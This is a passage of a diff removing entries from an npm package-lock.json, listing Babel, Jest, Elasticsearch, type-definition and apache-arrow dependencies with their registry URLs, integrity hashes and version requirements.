"resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-jsx": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.22.5.tgz", - "integrity": "sha512-gvyP4hZrgrs/wWMaocvxZ44Hw0b3W8Pe+cMxc8V1ULQ07oh8VNbIRaoD1LRZVTvD+0nieDKjfgKg89sD7rrKrg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.22.5" - } - }, - "@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.14.5" - } - }, - "@babel/plugin-syntax-typescript": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.22.5.tgz", - "integrity": "sha512-1mS2o03i7t1c6VzH6fdQ3OA8tcEIxwG18zIPRp+UY1Ihv6W+XZzBCVxExF9upussPXJ0xE9XRHwMoNs1ep/nRQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.22.5" - } - }, - "@babel/template": { - "version": "7.22.15", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.22.15.tgz", - "integrity": "sha512-QPErUVm4uyJa60rkI73qneDacvdvzxshT3kksGqlGWYdOTIUOwJ7RDUL8sGqslY1uXWSL6xMFKEXDS3ox2uF0w==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.22.13", - "@babel/parser": "^7.22.15", - "@babel/types": "^7.22.15" - } - }, - "@babel/traverse": { - "version": "7.23.2", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.23.2.tgz", - "integrity": "sha512-azpe59SQ48qG6nu2CzcMLbxUudtN+dOM9kDbUqGq3HXUJRlo7i8fvPoxQUzYgLZ4cMVmuZgm8vvBpNeRhd6XSw==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.22.13", - "@babel/generator": "^7.23.0", - "@babel/helper-environment-visitor": "^7.22.20", - "@babel/helper-function-name": "^7.23.0", - "@babel/helper-hoist-variables": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/parser": "^7.23.0", - "@babel/types": "^7.23.0", - "debug": "^4.1.0", - "globals": "^11.1.0" - } - }, - "@babel/types": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.23.0.tgz", - "integrity": "sha512-0oIyUfKoI3mSqMvsxBdclDwxXKXAUA8v/apZbc+iSyARYou1o8ZGDxbUYyLFoW2arqS2jDGqJuZvv1d/io1axg==", - "dev": true, - "requires": { - "@babel/helper-string-parser": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.20", - "to-fast-properties": "^2.0.0" - } - }, - "@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "@elastic/elasticsearch": { - "version": "8.18.2", - "resolved": "https://registry.npmjs.org/@elastic/elasticsearch/-/elasticsearch-8.18.2.tgz", - "integrity": "sha512-2pOc/hGdxkbaDavfAlnUfjJdVsFRCGqg7fpsWJfJ2UzpgViIyojdViHg8zOCT1J14lAwvDgb9CNETWa3SBZRfw==", - "requires": { - "@elastic/transport": "^8.9.6", - "apache-arrow": "18.x - 19.x", - "tslib": "^2.4.0" - } - }, - "@elastic/transport": { - "version": "8.9.6", - "resolved": "https://registry.npmjs.org/@elastic/transport/-/transport-8.9.6.tgz", - "integrity": "sha512-v71jgmZtgPg2ouXF5KTPxU1a6z7YYc8nazAS7jLySteC/vrShs1OJh6oEEeo5oDc19MYUofV/JV1h5vqJVBXOw==", - "requires": { - "@opentelemetry/api": "1.x", - "debug": "^4.4.0", - "hpagent": "^1.2.0", - "ms": "^2.1.3", - "secure-json-parse": "^3.0.1", - "tslib": "^2.8.1", - "undici": "^6.21.1" - } - }, - "@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "requires": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - } - }, - "@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true - }, - "@jest/console": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.6.1.tgz", - "integrity": "sha512-Aj772AYgwTSr5w8qnyoJ0eDYvN6bMsH3ORH1ivMotrInHLKdUz6BDlaEXHdM6kODaBIkNIyQGzsMvRdOv7VG7Q==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0" - } - }, - "@jest/core": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.6.1.tgz", - "integrity": "sha512-CcowHypRSm5oYQ1obz1wfvkjZZ2qoQlrKKvlfPwh5jUXVU12TWr2qMeH8chLMuTFzHh5a1g2yaqlqDICbr+ukQ==", - "dev": true, - "requires": { - "@jest/console": "^29.6.1", - "@jest/reporters": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.5.0", - "jest-config": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-resolve-dependencies": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "jest-watcher": "^29.6.1", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - } - }, - "@jest/environment": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.6.1.tgz", - "integrity": "sha512-RMMXx4ws+Gbvw3DfLSuo2cfQlK7IwGbpuEWXCqyYDcqYTI+9Ju3a5hDnXaxjNsa6uKh9PQF2v+qg+RLe63tz5A==", - "dev": true, - "requires": { - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1" - } - }, - "@jest/expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-N5xlPrAYaRNyFgVf2s9Uyyvr795jnB6rObuPx4QFvNJz8aAjpZUDfO4bh5G/xuplMID8PrnuF1+SfSyDxhsgYg==", - "dev": true, - "requires": { - "expect": "^29.6.1", - "jest-snapshot": "^29.6.1" - } - }, - "@jest/expect-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.6.1.tgz", - "integrity": "sha512-o319vIf5pEMx0LmzSxxkYYxo4wrRLKHq9dP1yJU7FoPTB0LfAKSz8SWD6D/6U3v/O52t9cF5t+MeJiRsfk7zMw==", - "dev": true, - "requires": { - "jest-get-type": "^29.4.3" - } - }, - "@jest/fake-timers": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.6.1.tgz", - "integrity": "sha512-RdgHgbXyosCDMVYmj7lLpUwXA4c69vcNzhrt69dJJdf8azUrpRh3ckFCaTPNjsEeRi27Cig0oKDGxy5j7hOgHg==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" - } - }, - "@jest/globals": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.6.1.tgz", - "integrity": "sha512-2VjpaGy78JY9n9370H8zGRCFbYVWwjY6RdDMhoJHa1sYfwe6XM/azGN0SjY8kk7BOZApIejQ1BFPyH7FPG0w3A==", - "dev": true, - "requires": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/types": "^29.6.1", - "jest-mock": "^29.6.1" - } - }, - "@jest/reporters": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.6.1.tgz", - "integrity": "sha512-9zuaI9QKr9JnoZtFQlw4GREQbxgmNYXU6QuWtmuODvk5nvPUeBYapVR/VYMyi2WSx3jXTLJTJji8rN6+Cm4+FA==", - "dev": true, - "requires": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^5.1.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - } - }, - "@jest/schemas": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.0.tgz", - "integrity": "sha512-rxLjXyJBTL4LQeJW3aKo0M/+GkCOXsO+8i9Iu7eDb6KwtP65ayoDsitrdPBtujxQ88k4wI2FNYfa6TOGwSn6cQ==", - "dev": true, - "requires": { - "@sinclair/typebox": "^0.27.8" - } - }, - "@jest/source-map": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.0.tgz", - "integrity": "sha512-oA+I2SHHQGxDCZpbrsCQSoMLb3Bz547JnM+jUr9qEbuw0vQlWZfpPS7CO9J7XiwKicEz9OFn/IYoLkkiUD7bzA==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.18", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - } - }, - "@jest/test-result": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.6.1.tgz", - "integrity": "sha512-Ynr13ZRcpX6INak0TPUukU8GWRfm/vAytE3JbJNGAvINySWYdfE7dGZMbk36oVuK4CigpbhMn8eg1dixZ7ZJOw==", - "dev": true, - "requires": { - "@jest/console": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - } - }, - "@jest/test-sequencer": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.6.1.tgz", - "integrity": "sha512-oBkC36PCDf/wb6dWeQIhaviU0l5u6VCsXa119yqdUosYAt7/FbQU2M2UoziO3igj/HBDEgp57ONQ3fm0v9uyyg==", - "dev": true, - "requires": { - "@jest/test-result": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "slash": "^3.0.0" - } - }, - "@jest/transform": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.6.1.tgz", - "integrity": "sha512-URnTneIU3ZjRSaf906cvf6Hpox3hIeJXRnz3VDSw5/X93gR8ycdfSIEy19FlVx8NFmpN7fe3Gb1xF+NjXaQLWg==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.2" - } - }, - "@jest/types": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.1.tgz", - "integrity": "sha512-tPKQNMPuXgvdOn2/Lg9HNfUvjYVGolt04Hp03f5hAk878uwOLikN+JzeLY0HcVgKgFl9Hs3EIqpu3WX27XNhnw==", - "dev": true, - "requires": { - "@jest/schemas": "^29.6.0", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - } - }, - "@jridgewell/gen-mapping": { - "version": "0.3.3", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.3.tgz", - "integrity": "sha512-HLhSWOLRi875zjjMG/r+Nv0oCW8umGb0BgEhyX3dDX3egwZtB8PqLnjz3yedt8R5StBrzcg4aBpnh8UA9D1BoQ==", - "dev": true, - "requires": { - "@jridgewell/set-array": "^1.0.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.9" - } - }, - "@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true - }, - "@jridgewell/set-array": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.1.2.tgz", - "integrity": "sha512-xnkseuNADM0gt2bs+BvhO0p78Mk762YnZdsuzFV018NoG1Sj1SCQvpSqa7XUaTam5vAGasABV9qXASMKnFMwMw==", - "dev": true - }, - "@jridgewell/sourcemap-codec": { - "version": "1.4.15", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.15.tgz", - "integrity": "sha512-eF2rxCRulEKXHTRiDrDy6erMYWqNw4LPdQ8UQA4huuxaQsVeRPFl2oM8oDGxMFhJUWZf9McpLtJasDDZb/Bpeg==", - "dev": true - }, - "@jridgewell/trace-mapping": { - "version": "0.3.18", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.18.tgz", - "integrity": "sha512-w+niJYzMHdd7USdiH2U6869nqhD2nbfZXND5Yp93qIbEmnDNk7PD48o+YchRVpzMU7M6jVCbenTR7PA1FLQ9pA==", - "dev": true, - "requires": { - "@jridgewell/resolve-uri": "3.1.0", - "@jridgewell/sourcemap-codec": "1.4.14" - }, - "dependencies": { - "@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true - } - } - }, - "@opentelemetry/api": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/@opentelemetry/api/-/api-1.9.0.tgz", - "integrity": "sha512-3giAOQvZiH5F9bMlMiv8+GSPMeqg0dbaeo58/0SlA9sxSqZhnUtxzX9/2FzyhS9sWQf5S0GJE0AKBrFqjpeYcg==" - }, - "@sinclair/typebox": { - "version": "0.27.8", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", - "dev": true - }, - "@sinonjs/commons": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.0.tgz", - "integrity": "sha512-jXBtWAF4vmdNmZgD5FoKsVLv3rPgDnLgPbU84LIJ3otV44vJlDRokVng5v8NFJdCf/da9legHcKaRuZs4L7faA==", - "dev": true, - "requires": { - "type-detect": "4.0.8" - } - }, - "@sinonjs/fake-timers": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", - "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", - "dev": true, - "requires": { - "@sinonjs/commons": "^3.0.0" - } - }, - "@swc/helpers": { - "version": "0.5.17", - "resolved": "https://registry.npmjs.org/@swc/helpers/-/helpers-0.5.17.tgz", - "integrity": "sha512-5IKx/Y13RsYd+sauPb2x+U/xZikHjolzfuDgTAl/Tdf3Q8rslRvC19NKDLgAJQ6wsqADk10ntlv08nPFw/gO/A==", - "requires": { - "tslib": "^2.8.0" - } - }, - "@types/babel__core": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.1.tgz", - "integrity": "sha512-aACu/U/omhdk15O4Nfb+fHgH/z3QsfQzpnvRZhYhThms83ZnAOZz7zZAWO7mn2yyNQaA4xTO8GLK3uqFU4bYYw==", - "dev": true, - "requires": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "@types/babel__generator": { - "version": "7.6.4", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.4.tgz", - "integrity": "sha512-tFkciB9j2K755yrTALxD44McOrk+gfpIpvC3sxHjRawj6PfnQxrse4Clq5y/Rq+G3mrBurMax/lG8Qn2t9mSsg==", - "dev": true, - "requires": { - "@babel/types": "^7.0.0" - } - }, - "@types/babel__template": { - "version": "7.4.1", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.1.tgz", - "integrity": "sha512-azBFKemX6kMg5Io+/rdGT0dkGreboUVR0Cdm3fz9QJWpaQGJRQXl7C+6hOTCZcMll7KFyEQpgbYI2lHdsS4U7g==", - "dev": true, - "requires": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - "@types/babel__traverse": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.1.tgz", - "integrity": "sha512-MitHFXnhtgwsGZWtT68URpOvLN4EREih1u3QtQiN4VdAxWKRVvGCSvw/Qth0M0Qq3pJpnGOu5JaM/ydK7OGbqg==", - "dev": true, - "requires": { - "@babel/types": "^7.20.7" - } - }, - "@types/command-line-args": { - "version": "5.2.3", - "resolved": "https://registry.npmjs.org/@types/command-line-args/-/command-line-args-5.2.3.tgz", - "integrity": "sha512-uv0aG6R0Y8WHZLTamZwtfsDLVRnOa+n+n5rEvFWL5Na5gZ8V2Teab/duDPFzIIIhs9qizDpcavCusCLJZu62Kw==" - }, - "@types/command-line-usage": { - "version": "5.0.4", - "resolved": "https://registry.npmjs.org/@types/command-line-usage/-/command-line-usage-5.0.4.tgz", - "integrity": "sha512-BwR5KP3Es/CSht0xqBcUXS3qCAUVXwpRKsV2+arxeb65atasuXG9LykC9Ab10Cw3s2raH92ZqOeILaQbsB2ACg==" - }, - "@types/graceful-fs": { - "version": "4.1.6", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.6.tgz", - "integrity": "sha512-Sig0SNORX9fdW+bQuTEovKj3uHcUL6LQKbCrrqb1X7J6/ReAbhCXRAhc+SMejhLELFj2QcyuxmUooZ4bt5ReSw==", - "dev": true, - "requires": { - "@types/node": "*" - } - }, - "@types/istanbul-lib-coverage": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.4.tgz", - "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==", - "dev": true - }, - "@types/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", - "dev": true, - "requires": { - "@types/istanbul-lib-coverage": "*" - } - }, - "@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", - "dev": true, - "requires": { - "@types/istanbul-lib-report": "*" - } - }, - "@types/jest": { - "version": "29.5.3", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.5.3.tgz", - "integrity": "sha512-1Nq7YrO/vJE/FYnqYyw0FS8LdrjExSgIiHyKg7xPpn+yi8Q4huZryKnkJatN1ZRH89Kw2v33/8ZMB7DuZeSLlA==", - "dev": true, - "requires": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" - } - }, - "@types/node": { - "version": "20.17.46", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.17.46.tgz", - "integrity": "sha512-0PQHLhZPWOxGW4auogW0eOQAuNIlCYvibIpG67ja0TOJ6/sehu+1en7sfceUn+QQtx4Rk3GxbLNwPh0Cav7TWw==", - "requires": { - "undici-types": "~6.19.2" - } - }, - "@types/prettier": { - "version": "2.7.3", - "resolved": "https://registry.npmjs.org/@types/prettier/-/prettier-2.7.3.tgz", - "integrity": "sha512-+68kP9yzs4LMp7VNh8gdzMSPZFL44MLGqiHWvttYJe+6qnuVr4Ek9wSBQoveqY/r+LwjCcU29kNVkidwim+kYA==", - "dev": true - }, - "@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "@types/yargs": { - "version": "17.0.24", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.24.tgz", - "integrity": "sha512-6i0aC7jV6QzQB8ne1joVZ0eSFIstHsCrobmOtghM11yGlH0j43FKL2UhWdELkyps0zuf7qVTUVCCR+tgSlyLLw==", - "dev": true, - "requires": { - "@types/yargs-parser": "*" - } - }, - "@types/yargs-parser": { - "version": "21.0.0", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", - "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", - "dev": true - }, - "ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, - "requires": { - "type-fest": "^0.21.3" - } - }, - "ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "dev": true - }, - "ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "requires": { - "color-convert": "^2.0.1" - } - }, - "anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, - "requires": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - } - }, - "apache-arrow": { - "version": "19.0.1", - "resolved": "https://registry.npmjs.org/apache-arrow/-/apache-arrow-19.0.1.tgz", - "integrity": "sha512-APmMLzS4qbTivLrPdQXexGM4JRr+0g62QDaobzEvip/FdQIrv2qLy0mD5Qdmw4buydtVJgbFeKR8f59I6PPGDg==", - 